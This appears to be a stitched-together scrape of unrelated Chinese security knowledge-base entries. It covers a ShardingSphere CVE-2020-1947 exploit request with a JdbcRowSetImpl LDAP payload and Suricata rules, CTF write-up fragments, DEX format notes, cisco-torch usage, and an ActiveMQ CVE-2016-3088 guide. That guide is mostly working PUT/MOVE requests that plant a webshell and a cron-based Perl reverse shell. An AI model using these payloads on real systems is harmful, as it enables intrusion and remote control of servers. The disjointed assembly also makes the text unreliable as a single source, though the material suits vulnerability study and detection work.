CJqYXZhLnV0aWwuTWFwXHUwMDNjamF2YS5sYW5nLnJlZmxlY3QuVHlwZSwgY29tLmdvb2dsZS5nc29uLkluc3RhbmNlQ3JlYXRvclx1MDAzYz9cdTAwM2VcdTAwM2UiOnt9LCJqYXZhLmxhbmcuVGhyZWFkTG9jYWxcdTAwM2NqYXZhLnV0aWwuTWFwXHUwMDNjY29tLmdvb2dsZS5nc29uLnJlZmxlY3QuVHlwZVRva2VuXHUwMDNjP1x1MDAzZSwgY29tLmdvb2dsZS5nc29uLkdzb24kRnV0dXJlVHlwZUFkYXB0ZXJcdTAwM2M/XHUwMDNlXHUwMDNlXHUwMDNlIjp7fSwiY29tLmdvb2dsZS5nc29uLkdzb24iOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5UeXBlQWRhcHRlcnMkMzIiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5UeXBlQWRhcHRlcnMkMzUiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuQ29uc3RydWN0b3JDb25zdHJ1Y3RvciI6e30sImJvb2xlYW4iOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5EYXRlVHlwZUFkYXB0ZXIkMSI6e30sImphdmEudXRpbC5MaXN0XHUwMDNjY29tLmdvb2dsZS5nc29uLkV4Y2x1c2lvblN0cmF0ZWd5XHUwMDNlIjp7fSwiY29tLmdvb2dsZS5nc29uLlR5cGVBZGFwdGVyRmFjdG9yeSI6e30sImludCI6e30sImNvbS5nb29nbGUuZ3Nvbi5GaWVsZE5hbWluZ1N0cmF0ZWd5Ijp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLmJpbmQuVHlwZUFkYXB0ZXJzJDMzIjp7fSwiY29tLmdvb2dsZS5nc29uLkV4Y2x1c2lvblN0cmF0ZWd5Ijp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLmJpbmQuQXJyYXlUeXBlQWRhcHRlciQxIjp7fSwiZG91YmxlIjp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLnJlZmxlY3QuUHJlSmF2YTlSZWZsZWN0aW9uQWNjZXNzb3IiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuRXhjbHVkZXIiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5UeXBlQWRhcHRlcnMkMjYiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5Db2xsZWN0aW9uVHlwZUFkYXB0ZXJGYWN0b3J5Ijp7fX0sImNvbnN0cnVjdG9yQ29uc3RydWN0b3IiOnsiaW5zdGFuY2VDcmVhdG9ycyI6e30sImFjY2Vzc29yIjp7fX0sImpzb25BZGFwdGVyRmFjdG9yeSI6eyJjb25zdHJ1Y3RvckNvbnN0cnVjdG9yIjp7Imluc3RhbmNlQ3JlYXRvcnMiOnt9LCJhY2Nlc3NvciI6e319fSwiZmFjdG9yaWVzIjpbbnVsbCxudWxsLHsidmVyc2lvbiI6LTEuMCwibW9kaWZpZXJzIjoxMzYsInNlcmlhbGl6ZUlubmVyQ2xhc3NlcyI6dHJ1ZSwicmVxdWlyZUV4cG9zZSI6ZmFsc2UsInNlcmlhbGl6YXRpb25TdHJhdGVnaWVzIjpbXSwiZGVzZXJpYWxpemF0aW9uU3RyYXRlZ2llcyI6W119LG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLHsiY29uc3RydWN0b3JDb25zdHJ1Y3RvciI6eyJpbnN0YW5jZUNyZWF0b3JzIjp7fSwiYWNjZXNzb3IiOnt9fX0seyJjb25zdHJ1Y3RvckNvbnN0cnVjdG9yIjp7Imluc3RhbmNlQ3JlYXRvcnMiOnt9LCJhY2Nlc3NvciI6e319LCJjb21wbGV4TWFwS2V5U2VyaWFsaXphdGlvbiI6ZmFsc2V9LHsiY29uc3RydWN0b3JDb25zdHJ1Y3RvciI6eyJpbnN0YW5jZUNyZWF0b3JzIjp7fSwiYWNjZXNzb3IiOnt9fX0sbnVsbCx7ImNvbnN0cnVjdG9yQ29uc3RydWN0b3IiOnsiaW5zdGFuY2VDcmVhdG9ycyI6e30sImFjY2Vzc29yIjp7fX0sImZpZWxkTmFtaW5nUG9saWN5IjoiSURFTlRJVFkiLCJleGNsdWRlciI6eyJ2ZXJzaW9uIjotMS4wLCJtb2RpZmllcnMiOjEzNiwic2VyaWFsaXplSW5uZXJDbGFzc2VzIjp0cnVlLCJyZXF1aXJlRXhwb3NlIjpmYWxzZSwic2VyaWFsaXphdGlvblN0cmF0ZWdpZXMiOltdLCJkZXNlcmlhbGl6YXRpb25TdHJhdGVnaWVzIjpbXX0sImpzb25BZGFwdGVyRmFjdG9yeSI6eyJjb25zdHJ1Y3RvckNvbnN0cnVjdG9yIjp7Imluc3RhbmNlQ3JlYXRvcnMiOnt9LCJhY2Nlc3NvciI6e319fSwiYWNjZXNzb3IiOnt9fV0sImV4Y2x1ZGVyIjp7InZlcnNpb24iOi0xLjAsIm1vZGlmaWVycyI6MTM2LCJzZXJpYWxpemVJbm5lckNsYXNzZXMiOnRydWUsInJlcXVpcmVFeHBvc2UiOmZhbHNlLCJzZXJpYWxpemF0aW9uU3RyYXRlZ2llcyI6W10sImRlc2VyaWFsaXphdGlvblN0cmF0ZWdpZXMiOltdfSwiZmllbGROYW1pbmdTdHJhdGVneSI6IklERU5USVRZIiwiaW5zdGFuY2VDcmVhdG9ycyI6e30sInNlcmlhbGl6ZU51bGxzIjpmYWxzZSwiY29tcGxleE1hcEtleVNlcmlhbGl6YXRpb24iOmZhbHNlLCJnZW5lcmF0ZU5vbkV4ZWN1dGFibGVKc29uIjpmYWxzZSwiaHRtbFNhZmUiOnRydWUsInByZXR0eVByaW50aW5nIjpmYWxzZSwibGVuaWVudCI6ZmFsc2UsInNlcmlhbGl6ZVNwZWNpYWxGbG9hdGluZ1BvaW50VmFsdWVzIjpmYWxzZSwiZGF0ZVN0eWxlIjoyLCJ0aW1lU3R5bGUiOjIsImxvbmdTZXJpYWxpemF0aW9uUG9saWN5IjoiREVGQVVMVCIsImJ1aWxkZXJGYWN0b3JpZXMiOltdLCJidWlsZGVySGllcmFyY2h5RmFjdG9yaWVzIjpbXX19 Content-Type: application/json;charset=utf-8 { "name": "CVE-2020-1947", "ruleConfiguration": " encryptors: encryptor_aes: type: aes props: aes.key.value: 123456abc encryptor_md5: type: md5 tables: t_encrypt: columns: user_id: plainColumn: user_plain cipherColumn: user_cipher encryptor: encryptor_aes order_id: cipherColumn: order_cipher encryptor: encryptor_md5", "dataSourceConfiguration": "!!com.sun.rowset.JdbcRowSetImpl dataSourceName: ldap://127.0.0.1:1389/ExportObject autoCommit: true" } HTTP/1.1 200 OK Date: Sun, 06 Jun 2021 17:09:47 GMT Content-Length: 11 Content-Type: text/plain; charset=utf-8 aesresponse ``` ## 检测规则/思路 ### Suricata规则 ```s alert http any any -> any any (msg:"CVE-2020-1947";flow:established,to_server;content:"POST";http_method;content:"/api/schema";http_uri;flowbits:set,first_req;noalert;classtype:web-application-attck;sid:1;rev:1;) alert http any any -> any any (msg:"CVE-2020-1947-Apache ShardingSphere远程代码执行漏洞";flow:established,to_client;content:"200";http_stat_code;content:"aesresponse";http_server_body;flowbits:isset,first_req;reference:url,www.cnblogs.com/potatsoSec/p/12461330.html;classtype:web-application-attck;sid:2;rev:1;) ``` ### 建议 流量+安全设备比较容易检测到此攻击行为。 ## 参考推荐 MITRE-ATT&CK-T1190 <https://attack.mitre.org/techniques/T1190/> CVE-2020-1947 Sharding-UI的反序列化复现及分析 <https://www.cnblogs.com/potatsoSec/p/12461330.html>
sec-knowleage
# 关于自动化威胁分析的探索 ~~开个新坑,慢慢填😂~~ 自动化的威胁分析,主要关注的点在于“威胁”。我们回顾一下概念: - Vulnerability - 本质上讲就是一类 "error" - Threat - 本质上讲就是一种 "event" - Exploit - 本质上讲是关于攻击的一种 "behavior" 或者说 "way" - Risk - 本质上讲,是描述一种 "situation" 从这些概念中可以知道,我们要进行自动化的威胁分析,就是要对威胁,这个"event"进行分析。那对”事件“进行分析,产出就不能是0或1 的向量形式,而是要以一种"knowledge"的方式描述。再说得实际点,我们不仅需要知道某个点是否有问题,还需要知道 who what when where how。 因此难度上来讲,还是比较高的。所以我们实际进行落地时,确实可以先进行特征判断,再进行模型检查,最后进行自动化分析。本篇主要是根据这个思路来进行整理。 ## 计算引擎 ### AIEngine https://bitbucket.org/camp0/aiengine/src/master/
sec-knowleage
# Writeup Internetwache CTF 2016 Team: akrasuski1, cr019283, c7f.m0d3, other019, rev, shalom ### Table of contents * [The hidden message (Misc 50)](misc_50) * Quick Run (Misc 60) * [Rock with the wired shark! (Misc 70)](misc_70) * [404 Flag not found (Misc 80)](misc_80) * BarParty (Misc 90) * [Mess of Hash (Web 50)](web_50) * Replace with Grace (Web 60) * [The Secret Store (Web 70)](web_70) * 0ldsk00lBlog (Web 80) * [TexMaker (Web 90)](web_90) * SPIM (Reverse 50) * File Checker (Reverse 60) * [ServerfARM (Reverse 70)](re_70) * [Eso Tape (Reverse 80)](re_80) * The Cube (Reverse 90) * [Crypto-Pirat (Crypto 50)](crypto_50) * [Oh Bob! (Crypto 60)](crypto_60) * [Hashdesigner (Crypto 70)](crypto_70) * Procrastination (Stegano/Crypto 80) * Bank (Crypto 90) * [A numbers game (PPC 50)](ppc_50) * [It's Prime Time! (PPC 60)](ppc_60) * [A numbers game II (PPC/Crypto 70)](ppc_70) * [Brute with Force (PPC 80)](ppc_80) * [Dark Forest (PPC 90)](ppc_90) * Ruby's count (Pwn 50) * EquationSolver (Pwn 60) * FlagStore (Pwn 70) * Remote Printer (Pwn 80) * Sh-ock (Pwn 90)
sec-knowleage
# SOP, reverse, 305p > Let me introduce a brand new concept - Syscall Oriented Programming! This was a fun challenge. The binary was very simple. It implemented a small VM with 16 registers (last of which was program counter), for which each operation was a syscall. The opcode structure was: 8 bits of syscall number, then up to 6 syscall arguments, which could be constants, VM registers or VM register addresses. We quickly wrote a bytecode disassembler in Python and found there were just a handful of syscalls used. Many of them didn't really make sense (getppid?) and `strace`ing showed they resulted in SIGSYS for some reason. It turned out the binary set up a mmapped region in which it wrote a tiny shellcode - SIGSYS handler (set up using sigaction syscall). It also set up a seccomp filter. Reversing it (using kernel jit dump) showed it dispatches syscalls into yet another VM level - so for example, `getgid` was actually `AND`. This allowed to bootstrap a reasonable run environment. We updated our disassembler to show these higher-level opcodes and found out the program implemented a variant of XTEA cipher. The key was constant, and the ciphertext embedded, so we could simply write the decryption code and get the flag.
sec-knowleage
# ActiveMQ任意文件写入漏洞(CVE-2016-3088) ## 环境搭建 搭建及运行漏洞环境: ``` docker compose build docker compose up -d ``` 环境监听61616端口和8161端口,其中8161为web控制台端口,本漏洞就出现在web控制台中。 访问`http://your-ip:8161/`看到web页面,说明环境已成功运行。 ## 背景简述 ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。 fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现: 1. 其使用率并不高 2. 文件操作容易出现漏洞 所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。 在测试过程中,可以关注ActiveMQ的版本,避免走弯路。 ## 漏洞详情 本漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)。所以,我们只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。 文件写入有几种利用方法: 1. 写入webshell 2. 写入cron或ssh key等文件 3. 写入jar或jetty.xml等库和配置文件 写入webshell的好处是,门槛低更方便,但前面也说了fileserver不解析jsp,admin和api两个应用都需要登录才能访问,所以有点鸡肋;写入cron或ssh key,好处是直接反弹拿shell,也比较方便,缺点是需要root权限;写入jar,稍微麻烦点(需要jar的后门),写入xml配置文件,这个方法比较靠谱,但有个鸡肋点是:我们需要知道activemq的绝对路径。 分别说一下上述几种利用方法。 ### 写入webshell 前面说了,写入webshell,需要写在admin或api应用中,而这俩应用都需要登录才能访问。 默认的ActiveMQ账号密码均为`admin`,首先访问`http://your-ip:8161/admin/test/systemProperties.jsp`,查看ActiveMQ的绝对路径: ![](02.png) 然后上传webshell: ``` PUT /fileserver/2.txt HTTP/1.1 Host: localhost:8161 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 120976 webshell... ``` 移动到web目录下的api文件夹(`/opt/activemq/webapps/api/s.jsp`)中: ``` MOVE /fileserver/2.txt HTTP/1.1 Destination: file:///opt/activemq/webapps/api/s.jsp Host: localhost:8161 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0 ``` 访问webshell(需要登录): ![](03.png) ### 写入crontab,自动化弹shell 这是一个比较稳健的方法。首先上传cron配置文件(注意,换行一定要`\n`,不能是`\r\n`,否则crontab执行会失败): ``` PUT /fileserver/1.txt HTTP/1.1 Host: localhost:8161 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 248 */1 * * * * root /usr/bin/perl -e 'use Socket;$i="10.0.0.1";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ``` 将其移动到`/etc/cron.d/root`: ``` MOVE /fileserver/1.txt HTTP/1.1 Destination: file:///etc/cron.d/root Host: localhost:8161 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0 ``` 如果上述两个请求都返回204了,说明写入成功。等待反弹shell: ![](01.png) 这个方法需要ActiveMQ是root运行,否则也不能写入cron文件。 ### 写入jetty.xml或jar 理论上我们可以覆盖jetty.xml,将admin和api的登录限制去掉,然后再写入webshell。 有的情况下,jetty.xml和jar的所有人是web容器的用户,所以相比起来,写入crontab成功率更高一点。 尚未测试。
sec-knowleage
### DEX文件基本介绍 Google 为 Android 中的 Java 代码专门设计了对应的可执行文件 DEX(Dalvik eXecutable File),适用于手机这样的内存低和处理器性能较差的移动平台。下面,我们就来主要介绍一下DEX文件的格式。 ### DEX 文件数据类型定义 在介绍 DEX 文件的具体结构之前,我们先来关注一下 DEX 文件中所使用的一些基础的数据类型。 | 名称 | 说明 | | --------- | -------------------------- | | byte | 8 位有符号整数 | | ubyte | 8 位无符号整数 | | short | 16 位有符号整数,采用小端字节序 | | ushort | 16 位无符号整数,采用小端字节序 | | int | 32 位有符号整数,采用小端字节序 | | uint | 32 位无符号整数,采用小端字节序 | | long | 64 位有符号整数,采用小端字节序 | | ulong | 64 位无符号整数,采用小端字节序 | | sleb128 | 有符号 LEB128,可变长度(见下文) | | uleb128 | 无符号 LEB128,可变长度(见下文) | | uleb128p1 | 无符号 LEB128 加 `1`,可变长度(见下文) | 其中之所以会采用变长的数据类型是因为希望可以尽可能减少可执行文件的占用空间,比如说如果一个字符串的长度为5,那么我们其实只需要一个字节即可,但是我们又不希望直接使用`u1` 来进行定义相应类型,因为这样会把所有的字符串长度都限制在相应的范围内。 可变长度的类型其实都是基于 LEB128(Little-Endian Base) 类型的,可以用于表示 32 位大小的 int 数字,其根据所要表示的数字的大小来选择合适的长度。如下图所示,其中每个字节的最高位表示是否使用下一个字节,1 表示使用,0 表示不使用。故而每个字节其实只有 7 个有效的 bit 位用来表示相应的数字。如果有一个 LEB128 类型的变量使用了 5 个字节,并且第五个字节的最高位为 1 ,那说明出现了问题。 dalvik中读取无符号leb128类型的函数如下 ```c++ DEX_INLINE int readUnsignedLeb128(const u1** pStream) { const u1* ptr = *pStream; int result = *(ptr++); //取第一个字节 if (result > 0x7f) { //如果第1个字节大于0x7f,表示第一个字节最高位为1 int cur = *(ptr++); //第2个字节 result = (result & 0x7f) | ((cur & 0x7f) << 7); //前两个字节 if (cur > 0x7f) { cur = *(ptr++); result |= (cur & 0x7f) << 14; if (cur > 0x7f) { cur = *(ptr++); result |= (cur & 0x7f) << 21; if (cur > 0x7f) { /* * Note: We don't check to see if cur is out of * range here, meaning we tolerate garbage in the * high four-order bits. */ cur = *(ptr++); result |= cur << 28; } } } } *pStream = ptr; return result; } ``` 举个例子,假如我们要计算c0 83 92 25的uleb128值,如下 - 第一个字节的最高位为1,所以有第二个字节。result1 = 0xc0 & 0x7f=0x40 - 类似的,第二个字节对应的result2 = (0x83 & 0x7f)<<7 = 0x180 - 第三个字节对应的result3 = (0x92 & 0x7f) <<14 = 0x48000 - 第四个字节对应的result4 = (0x25)<<21 = 0x4a00000 - 该字节流对应的值为result1+result2+result3+result4 = 0x4a481c0 dalvik中读取有符号的LEB128类型的数字如下 ```c++ DEX_INLINE int readSignedLeb128(const u1** pStream) { const u1* ptr = *pStream; int result = *(ptr++); if (result <= 0x7f) { result = (result << 25) >> 25; //符号扩展 } else { int cur = *(ptr++); result = (result & 0x7f) | ((cur & 0x7f) << 7); if (cur <= 0x7f) { result = (result << 18) >> 18; //符号扩展 } else { cur = *(ptr++); result |= (cur & 0x7f) << 14; //符号扩展 if (cur <= 0x7f) { result = (result << 11) >> 11; //符号扩展 } else { cur = *(ptr++); result |= (cur & 0x7f) << 21; if (cur <= 0x7f) { result = (result << 4) >> 4; //符号扩展 } else { /* * Note: We don't check to see if cur is out of * range here, meaning we tolerate garbage in the * high four-order bits. */ cur = *(ptr++); result |= cur << 28; } } } } *pStream = ptr; return result; } ``` 举个例子,假如我们要计算d1 c2 b3 40的sleb128值,计算过程如下 - result1 = 0xd1 & 0x7f = 0x51 - result2 = (0xc2 & 0x7f) <<7 = 0x21000 - result3 = (0xb3 & 0x7f) <<14 =0xcc000 - result4 = (0x40)<< 21 = 0x8000000 - 最后结果(r1+r2+r3+r4)<< 4 >>4 = 0xf80ce151 uleb128p1类型主要是用表示无符号数,其适用于以下场景 - 要求数字的表示必须非负 - 当数字为0xffffffff时,其加上1就为0,这时候我们就只需要1个字节即可。 - **有待进一步思考。** ### DEX 文件概览 DEX文件的整体结构如下 主要包括三个部分 - 文件头,给出dex文件的基本属性。 - 索引区,给出相关数据的索引,其数据其实放在数据区。 - 数据区,存放真实的字符串,代码。 ### DEX 文件头 DEX的文件头主要包含magic字段、alder32校验值、SHA-1哈希值、string_ids的个数以及偏移地址等,固定占用0x70个字节,数据结构如下 ```c++ struct DexHeader { u1 magic[8]; /* includes version number */ u4 checksum; /* adler32 checksum */ u1 signature[kSHA1DigestLen]; /* SHA-1 hash */ u4 fileSize; /* length of entire file */ u4 headerSize; /* offset to start of next section */ u4 endianTag; u4 linkSize; u4 linkOff; u4 mapOff; u4 stringIdsSize; u4 stringIdsOff; u4 typeIdsSize; u4 typeIdsOff; u4 protoIdsSize; u4 protoIdsOff; u4 fieldIdsSize; u4 fieldIdsOff; u4 methodIdsSize; u4 methodIdsOff; u4 classDefsSize; u4 classDefsOff; u4 dataSize; u4 dataOff; }; ``` 其中具体的描述如下 | 名称 | 格式 | 说明 | | --------------- | ------------------------- | ---------------------------------------- | | magic | ubyte[8] = DEX_FILE_MAGIC | 标识DEX文件,其中DEX_FILE_MAGIC ="dex\n035\0" | | checksum | uint | 除 `magic` 和此字段之外的文件剩下内容的 adler32 校验和,用于检测文件损坏情况 | | signature | ubyte[20] | 除 `magic`、`checksum` 和此字段之外的文件的内容的 SHA-1 签名(哈希),用于对文件进行唯一标识 | | file_size | uint | 整个文件(包括文件头)的大小,以字节为单位 | | header_size | uint = 0x70 | 文件头的大小,以字节为单位。 | | endian_tag | uint = ENDIAN_CONSTANT | 字节序标记,大端序或者小端序。 | | link_size | uint | 如果此文件未进行静态链接,则该值为 `0`,反之为链接区段的大小, | | link_off | uint | 如果 `link_size == 0`,则该值为 `0`; 反之,该偏移量是文件开头到到 `link_data` 区段的偏移量。 | | map_off | uint | 该偏移量必须非零,标识从文件开头到 `data` 区段的偏移量。 | | string_ids_size | uint | 字符串标识符列表中的字符串数量 | | string_ids_off | uint | 如果 `string_ids_size == 0`(不可否认是一种奇怪的极端情况),则该值为 `0`; 反之表示从文件开头到`string_ids`的偏移量。 | | type_ids_size | uint | 类型标识符列表中的元素数量,最大为 65535 | | type_ids_off | uint | 如果 `type_ids_size == 0`(不可否认是一种奇怪的极端情况),则该值为 `0`; 反之表示从文件开头到 `type_ids` 区段开头的偏移量。 | | proto_ids_size | uint | 原型(方法)标识符列表中的元素数量,最多为 65535 | | proto_ids_off | uint | 如果 `proto_ids_size == 0`(不可否认是一种奇怪的极端情况),则该值为 `0`; 反之该偏移量表示文件开头到 `proto_ids` 区段开头的偏移量。 | | field_ids_size | uint | 字段标识符列表中的元素数量 | | field_ids_off | uint | 如果 `field_ids_size == 0`,则该值为 `0`; 反之该偏移量表示文件开头到 `field_ids` 区段开头的偏移量。 | | method_ids_size | uint | 方法标识符列表中的元素数量 | | method_ids_off | uint | 如果 `method_ids_size == 0`,则该值为 `0`。反之该偏移量表示从文件开头到 `method_ids` 区段开头的偏移量。 | | class_defs_size | uint | 类定义列表中的元素数量 | | class_defs_off | uint | 如果 `class_defs_size == 0`(不可否认是一种奇怪的极端情况),则该值为 `0` ;反之该偏移量表示文件开头到 `class_defs` 区段开头的偏移量。 | | data_size | uint | `data` 区段的以字节为单位的大小,必须是 sizeof(uint) 的偶数倍,说明8字节对齐。 | | data_off | uint | 从文件开头到 `data` 区段开头的偏移量。 | ### DEX 索引区 #### string id StringIds 区段包含`stringIdsSize`个`DexStringId`结构,其结构如下: ```c++ struct DexStringId { u4 stringDataOff; /* 字符串数据偏移,也就是数据区中各个 StringData 的文件偏移*/ }; ``` 可以看出DexStringId中存储的只是每一个字符串的相对偏移。此外,每一个偏移占据4个字节,字符串部分一共会占据4*stringIdsSize个字节。 在对应的偏移处,字符串是使用MUTF-8格式存储的,其开头存储了之前我们所说的LEB128类型的变量,表示字符串的长度,之后紧跟着的就是字符串,之后以\x00结尾,字符串的长度不包含\x00。 #### type id type_ids 区索引了java代码中使用的所有类型(类、数组或基本类型),此列表必须按 `string_id` 索引进行排序,并且不能重复。 ```c++ struct DexTypeId { u4 descriptorIdx; /* 指向 DexStringId列表的索引 */ }; ``` #### proto Id Proto id字段主要是针对于 java 中的方法原型而设计的,这里面主要包含了一个方法声明的返回类型与参数列表,对于方法名尚未涉及。其主要包含以下三个数据结构 ```c++ struct DexProtoId { u4 shortyIdx; /* 返回类型+参数类型,简写,指向DexStringId列表的索引 */ u4 returnTypeIdx; /* 返回类型,指向DexTypeId列表的索引 */ u4 parametersOff; /* 参数类型,指向DexTypeList的偏移 */ } struct DexTypeList { u4 size; /* DexTypeItem的个数,即参数个数 */ DexTypeItem list[1]; /* 指向DexTypeItem开始处 */ }; struct DexTypeItem { u2 typeIdx; /* 参数类型,指向DexTypeId列表的索引,最终指向字符串索引 */ }; ``` #### field id field id区主要是针对于java中每个类的字段而设计的,主要涉及到以下数据结构 ```c++ struct DexFieldId { u2 classIdx; /* 类的类型,指向DexTypeId列表的索引 */ u2 typeIdx; /* 字段类型,指向DexTypeId列表的索引 */ u4 nameIdx; /* 字段名,指向DexStringId列表的索引 */ }; ``` #### method id method id区是直接为 java 中的方法而设计的,其包含了方法所在的类,方法的原型,方法的名字。 ```c++ struct DexMethodId { u2 classIdx; /* 类的类型,指向DexTypeId列表的索引 */ u2 protoIdx; /* 声明类型,指向DexProtoId列表的索引 */ u4 nameIdx; /* 方法名, 指向DexStringId列表的索引 */ }; ``` #### class def classDefsSize表明 class def 区域的大小,classDefsOff表明class def 区的偏移。 该区是为 java 中的类而设计的,包含以下的数据结构,相关信息如下 ```c++ // 类的基本信息 struct DexClassDef { u4 classIdx; /* 类的类型,指向DexTypeId列表的索引 */ u4 accessFlags; /* 访问标志 */ u4 superclassIdx; /* 父类类型,指向DexTypeId列表的索引 */ u4 interfacesOff; /* 接口,指向DexTypeList的偏移 */ u4 sourceFileIdx; /* 源文件名,指向DexStringId列表的索引 */ u4 annotationsOff; /* 注解,指向DexAnnotationsDirectoryItem结构 */ u4 classDataOff; /* 指向DexClassData结构的偏移 */ u4 staticValuesOff; /* 指向DexEncodedArray结构的偏移 */ }; // 类的字段与方法概况 struct DexClassData { DexClassDataHeader header; /* 指定字段与方法的个数 */ DexField* staticFields; /* 静态字段,DexField结构 */ DexField* instanceFields; /* 实例字段,DexField结构 */ DexMethod* directMethods; /* 直接方法,DexMethod结构 */ DexMethod* virtualMethods; /* 虚方法,DexMethod结构 */ // 详细描述类的字段个数与方法个数 struct DexClassDataHeader { u4 staticFieldsSize; /* 静态字段个数 */ u4 instanceFieldsSize; /* 实例字段个数 */ u4 directMethodsSize; /* 直接方法个数 */ u4 virtualMethodsSize; /* 虚方法个数 */ }; // 字段定义 struct DexField { u4 fieldIdx; /* 指向DexFieldId的索引 */ u4 accessFlags; /* 访问标志 */ }; // 方法定义 struct DexMethod { u4 methodIdx; /* 指向DexMethodId的索引 */ u4 accessFlags; /* 访问标志 */ u4 codeOff; /* 指向DexCode结构的偏移 */ }; // 代码概况 struct DexCode { u2 registersSize; /* 使用的寄存器个数 */ u2 insSize; /* 参数个数 */ u2 outsSize; /* 调用其他方法时其它方法使用的寄存器个数,会在自己的调用栈申请,并压栈(猜测) */ u2 triesSize; /* Try/Catch个数 */ u4 debugInfoOff; /* 指向调试信息的偏移 */ u4 insnsSize; /* 指令集个数,以2字节为单位 */ u2 insns[1]; /* 指令集 */ }; ``` #### 小结 可以看出在索引区指向是比较复杂的,但同时也比较巧妙,这里给出Dalvik设计者在[Google Developer Day 2008 China](https://sites.google.com/site/developerdaychina/) 演讲中给出的例子。 ### DEX map section DexHeader中的mapOff字段给出了DexMapList结构在DEX文件中的偏移。当Dalvik虚拟机解析DEX文件后的内容后,会将内容映射到DexMapList数据结构,可以说该结构描述了对应的DEX文件的整体概况。其具体代码如下 ```c++ struct DexMapList { u4 size; /* DexMapItem的个数,方便解析 */ DexMapItem list[1]; /* 指向DexMapItem */ }; struct DexMapItem { u2 type; /* kDexType开头的类型 */ u2 unused; /* 未使用,用于字节对齐 */ u4 size; /* 指定相应类型的个数 */ u4 offset; /* 指定相应类型的数据的文件偏移 */ }; /* type字段为一个枚举常量,通过类型名称很容易判断它的具体类型。 */ /* map item type codes */ enum { kDexTypeHeaderItem = 0x0000, kDexTypeStringIdItem = 0x0001, kDexTypeTypeIdItem = 0x0002, kDexTypeProtoIdItem = 0x0003, kDexTypeFieldIdItem = 0x0004, kDexTypeMethodIdItem = 0x0005, kDexTypeClassDefItem = 0x0006, kDexTypeMapList = 0x1000, kDexTypeTypeList = 0x1001, kDexTypeAnnotationSetRefList = 0x1002, kDexTypeAnnotationSetItem = 0x1003, kDexTypeClassDataItem = 0x2000, kDexTypeCodeItem = 0x2001, kDexTypeStringDataItem = 0x2002, kDexTypeDebugInfoItem = 0x2003, kDexTypeAnnotationItem = 0x2004, kDexTypeEncodedArrayItem = 0x2005, kDexTypeAnnotationsDirectoryItem = 0x2006, }; ```
sec-knowleage
--- title: cisco-torch categories: Information Gathering tags: [vulnerability analysis,kali linux,exploitation tools,cdpsnarf,information gathering,] date: 2016-10-19 14:11:46 --- 0x00 cisco-torch介绍 ------------- Cisco Torch是集大规模扫描,指纹识别和利用工具的下一代“黑掉暴露的思科网络”工具,开发它的原因是上市场上提供的工具不能满足我们的需要。 Cisco-torch与类似工具不同的主要特性是大量启动多个后台扫描进程,以实现最高的扫描效率。此外,如果需要,它可以同时使用几种应用程序层指纹的方法。我们k'yi快速发现运行Telnet,SSH,Web,NTP和SNMP服务的远程思科主机,并针对发现的服务启动字典攻击。 工具来源:https://github.com/Zapotek/cdpsnarf [cisco-torch主页][1] | [Kali cisco-torch Repo仓库][2] - 作者:Born by Arhont Team - 证书:LGPL-2.1 0x01 cisco-torch功能 --------------- cisco-torch - 思科设备扫描器 ```shell root@kali:~# cisco-torch sing配置文件torch.conf ... 正在载入include和plugin ... 用法:cisco-torch <选项> <IP地址,主机名,网络段> 或:cisco-torch <选项> -F <主机列表文件> 可用选项: -O <输出文件> -A 组合所有指纹扫描类型 -t 思科Telnetd扫描 -s 思科SSHd扫描 -u 思科SNMP扫描 -g Cisco配置或tftp文件下载 -n NTP指纹扫描 -j TFTP指纹扫描 -l <type> 日志记录层次 c 关键摘要模式(默认) v 详细模式 d 调试模式 -w 思科Web服务器扫描 -z 思科IOS HTTP授权漏洞扫描 -c 扫描支持SSL思科Web服务器 -b 密码字典攻击(仅与-s,-u,-c,-w,-j或-t一起使用) -V 打印版本信息并退出 示例: cisco-torch -A 10.10.0.0/16 cisco-torch -s -b -F sshtocheck.txt cisco-torch -w -z 10.10.0.0/16 cisco-torch -j -b -g -F tftptocheck.txt ``` 0x02 cisco-torch用法示例 ----------------- 